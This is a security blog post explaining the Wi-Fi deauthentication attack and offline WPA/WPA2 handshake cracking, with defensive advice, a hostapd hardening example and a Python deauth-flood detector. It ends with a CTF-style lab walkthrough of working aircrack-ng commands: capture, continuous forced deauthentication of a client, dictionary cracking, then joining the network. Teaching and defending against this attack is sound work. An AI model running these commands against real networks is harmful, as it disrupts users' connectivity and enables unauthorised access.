Hacking WiFi – Deauthentication Client

In this post, we’re going to look at one of the most classic Wi-Fi attacks: the deauthentication attack, and how it’s used to force clients to reconnect so an attacker can capture and crack the WPA/WPA2 handshake. No tool spam, no magic commands — just a clear breakdown of how the protocol works, where the weakness comes from, and why this attack is even possible in the first place.

If you’ve ever wondered how Wi-Fi handshakes are cracked, why getting “kicked off” a network is such a big deal, or why WPA3 had to happen at all, you’re in the right place. Grab a coffee and let’s break Wi-Fi the right way — by understanding it first.

Forcing Client Disconnects and Cracking the WPA/WPA2 Handshake

Disclaimer: This article is for educational and defensive security purposes only. Performing Wi‑Fi attacks on networks you do not own or have explicit permission to test is illegal in many jurisdictions.


1. What Problem Does the Deauthentication Attack Solve?

When attacking WPA/WPA2‑PSK Wi‑Fi networks, you don’t need to crack the Wi‑Fi password directly from the air. Instead, you capture a cryptographic exchange called the 4‑Way Handshake and then attempt to crack it offline.

The problem?

  • The handshake is only transmitted when a client connects or reconnects to the access point (AP).
  • If no one is connecting… there is nothing to capture.

The deauthentication attack solves this by forcibly disconnecting clients, causing them to reconnect and re‑transmit the handshake.


2. Key Concepts You Need to Understand First

Before diving into the attack, let’s break down the core Wi‑Fi concepts involved.


2.1 Access Point (AP)

The Access Point is the Wi‑Fi router. It:

  • Broadcasts the network name (SSID)
  • Authenticates clients
  • Manages encryption keys

Each AP has a unique BSSID, which is its MAC address.


2.2 Client (Station)

A client (STA) is any device connected to Wi‑Fi:

  • Laptop
  • Phone
  • IoT device

Each client also has a MAC address.


2.3 WPA/WPA2‑PSK Encryption Model

In WPA/WPA2‑PSK (pre‑shared key):

  • The Wi‑Fi password is never sent over the air
  • Both client and AP independently derive encryption keys from:
    • SSID
    • Wi‑Fi password
    • Random nonces

The process that verifies both sides know the password is the 4‑Way Handshake.


3. The 4‑Way Handshake (Core of the Attack)

The handshake is a challenge‑response protocol used to establish session keys.

3.1 Handshake Flow

Client                                Access Point
  |                                        |
  |<------------- (1) ANonce --------------|
  |                                        |
  |---- (2) SNonce + MIC ----------------->|
  |                                        |
  |<------------ (3) GTK + MIC ------------|
  |                                        |
  |---- (4) ACK -------------------------->|

Where:

  • ANonce: Random value generated by AP
  • SNonce: Random value generated by client
  • MIC: Message Integrity Code (proof client knows the password)
  • GTK: Group Temporal Key

⚠️ Important: Capturing just messages (1) and (2) is usually enough to crack the password offline.


4. Why the Handshake Can Be Cracked Offline

Once you capture the handshake:

  • You can guess passwords locally
  • No more interaction with the Wi‑Fi network is needed
  • No rate‑limiting or lockouts apply

Offline Cracking Logic

Guess Password
   ↓
Derive PMK
   ↓
Recalculate MIC
   ↓
Compare with Captured MIC

If the MIC matches → password is correct.


5. Enter the Deauthentication Attack

5.1 What Is Deauthentication?

Deauthentication is a legitimate 802.11 management frame used to:

  • Disconnect a client from an AP
  • Inform the client that authentication is no longer valid

Critical Flaw

In WPA/WPA2, deauthentication frames are:

  • Unauthenticated
  • Unencrypted

That means anyone can forge them.


6. How the Deauthentication Attack Works

Step‑by‑Step Overview

  1. Attacker monitors the Wi‑Fi network
  2. Identifies:
    • AP MAC (BSSID)
    • Client MAC(s)
  3. Attacker sends fake deauth frames
  4. Client gets disconnected
  5. Client automatically reconnects
  6. 4‑Way Handshake is transmitted
  7. Attacker captures handshake

6.1 Attack Flow Diagram

        [ Attacker ]
              |
              |  Deauth Frame (spoofed)
              v
        [ Client ]  x------> [ Access Point ]
              ^                    |
              |---- Reconnect -----|
              |
       Handshake Captured

7. Types of Deauthentication Attacks

7.1 Targeted Deauth (Client‑Specific)

  • Targets a specific client MAC
  • Stealthier
  • Faster handshake capture

Deauth: AP → Client

7.2 Broadcast Deauth (All Clients)

  • Uses broadcast MAC (FF:FF:FF:FF:FF:FF)
  • Disconnects every client
  • Noisy but effective

Deauth: AP → ALL

8. Capturing the Handshake

To capture the handshake, the attacker needs:

  • Wireless card supporting monitor mode
  • Ability to capture management frames

The attacker listens for:

  • EAPOL packets
  • Valid MIC values

Once captured, the attacker can stop interacting with the network entirely.


9. Cracking the Handshake

9.1 Dictionary Attack

Most common method:

  • Use wordlists (e.g. leaked passwords)
  • Try millions of guesses per second (GPU)

9.2 Mask Attacks

Used when you know the password structure:

CompanyName202?

9.3 Why Strong Passwords Matter

  • WPA2 is cryptographically strong
  • The password is the weakest link

A strong, random passphrase makes a captured handshake useless to the attacker, because the offline guessing never finishes.


10. Limitations of Deauthentication Attacks

10.1 WPA3

WPA3 introduces:

  • Protected Management Frames (PMF)
  • SAE (Dragonfly) key exchange

Result:

  • Deauth frames are authenticated
  • Offline cracking is no longer feasible
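As an added example (not from the original post) of what "deauth frames are authenticated" means in practice: a hostapd.conf fragment showing the default, unprotected setting beside the hardened 802.11w setting. Interface name, SSID and passphrase are placeholders; the key names are hostapd's own.

```ini
# hostapd.conf fragment (AP side). Placeholders: wlan0, EXAMPLE_SSID, passphrase.
interface=wlan0
ssid=EXAMPLE_SSID
wpa=2
wpa_passphrase=REPLACE_WITH_LONG_RANDOM_PASSPHRASE
rsn_pairwise=CCMP

# Weak (hostapd default): management frames are neither authenticated nor
# encrypted, so a forged deauthentication frame is accepted by every client.
#ieee80211w=0
#wpa_key_mgmt=WPA-PSK

# Hardened: 802.11w Protected Management Frames required. Deauth/disassoc
# frames now carry a MIC keyed from the session keys, so forged ones are
# dropped. 1 would make PMF optional and leave legacy clients unprotected.
ieee80211w=2
wpa_key_mgmt=WPA-PSK WPA-PSK-SHA256
```

Clients that cannot do PMF will not be able to associate once ieee80211w=2 is set, which is the trade-off to test before rolling it out.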

10.2 No Clients = No Handshake

If no clients reconnect:

  • No handshake
  • Attack fails

11. Defensive Takeaways

To protect Wi‑Fi networks:

  • ✅ Use WPA3 where possible
  • ✅ Enable 802.11w (PMF)
  • ✅ Use long, random passphrases
  • ✅ Monitor for excessive deauth frames
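As an added illustration of the last takeaway (this is not part of the original post): a small Python monitor that parses bare 802.11 deauthentication/disassociation frames and raises an alert on a burst from one BSSID within a short window, or on any broadcast deauth. It assumes the radiotap header has already been stripped, and the frames it checks are constructed samples so it runs offline.

```python
import struct
from collections import deque

# Bare 802.11 management frame (radiotap already stripped), constructed below for the sample:
#   frame control (2) | duration (2) | addr1 (6) | addr2 (6) | addr3 (6) | seq ctl (2) | body
# Deauth (subtype 12) and disassoc (subtype 10) bodies begin with a 2-byte reason code.
DEAUTH, DISASSOC = 12, 10
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_mgmt(frame):
    """Return (subtype, addr1, addr2, addr3, reason) for a deauth/disassoc frame, else None."""
    if len(frame) < 26:
        return None
    fc = frame[0]
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4   # type 0 = management
    if ftype != 0 or subtype not in (DEAUTH, DISASSOC):
        return None
    reason = struct.unpack("<H", frame[24:26])[0]
    return subtype, mac(frame[4:10]), mac(frame[10:16]), mac(frame[16:22]), reason

class DeauthMonitor:
    """Alert on > `limit` deauth/disassoc frames from one BSSID per `window` s, or any broadcast deauth."""
    def __init__(self, limit=5, window=2.0):
        self.limit, self.window = limit, window
        self.seen = {}   # bssid -> deque of frame timestamps inside the window

    def observe(self, ts, frame):
        parsed = parse_mgmt(frame)
        if parsed is None:
            return None
        _subtype, dst, _src, bssid, reason = parsed
        q = self.seen.setdefault(bssid, deque())
        q.append(ts)
        while q and ts - q[0] > self.window:   # slide the window forward
            q.popleft()
        alerts = []
        if dst == BROADCAST:   # a healthy AP almost never deauths everyone at once
            alerts.append(f"broadcast deauth from {bssid} (reason {reason})")
        if len(q) > self.limit:
            alerts.append(f"{len(q)} deauth/disassoc frames from {bssid} in {self.window}s")
        return alerts or None

def build_frame(subtype, dst, src, bssid, reason=7):
    """Construct a sample frame for offline testing (not a real capture)."""
    hexmac = lambda s: bytes.fromhex(s.replace(":", ""))
    return (bytes([subtype << 4, 0]) + b"\x00\x00" + hexmac(dst) + hexmac(src)
            + hexmac(bssid) + b"\x00\x00" + struct.pack("<H", reason))
```

On a real sensor, feed `observe()` with the timestamp and 802.11 payload of each frame from a monitor-mode capture; tune `limit` and `window` to the AP's normal roaming behaviour to keep false positives down.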

12. Final Thoughts

The deauthentication attack is a classic Wi‑Fi design flaw:

  • Not a crypto failure
  • But a protocol trust issue

It remains one of the most important concepts to understand when learning:

  • Wireless pentesting
  • Wi‑Fi defense
  • Real‑world protocol weaknesses

If you understand deauth + handshake cracking, you understand why WPA3 exists.


Hands‑on lab walkthrough

This walkthrough is based on a CTF, which is why some of the screenshots are blurry.

  • Update the package lists:
sudo apt -y update
  • Install aircrack:
sudo apt -y install aircrack-ng
  • Monitor the network:
airodump-ng wlan0
  • Monitor the target wireless network on its channel and write the capture to a file:
airodump-ng -c 1 --bssid WIFI_MAC_BSSID -w voip.pcap wlan0
  • From another terminal, force the deauthentication of the client:
aireplay-ng --deauth 0 -a WIFI_MAC_BSSID -c STATION_MAC wlan0
  • Then the handshake is captured:
  • Crack the handshake:
aircrack-ng -w /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt voip.pcap-01.cap

Now that we have the password we can connect to the network:

  • Shut the interface down again:
ifconfig wlan0 down
  • Change the interface mode:
iwconfig wlan0 managed
  • Create the wpa_supplicant configuration file under /tmp:
echo 'ctrl_interface=/var/run/wpa_supplicant
network={
    ssid="WIFI_NAME"
    psk="PASSWORD"
    key_mgmt=WPA-PSK
}' | sudo tee /tmp/ture/wpa_supplicant.conf
  • Connect to the Wi‑Fi:
wpa_supplicant -i wlan0 -c /tmp/ture/wpa_supplicant.conf -B
  • Turn on the interface:
ifconfig wlan0 up
  • Request an IP through DHCP:
dhclient wlan0

Find more interesting posts on:

Blog – Hardsoft Security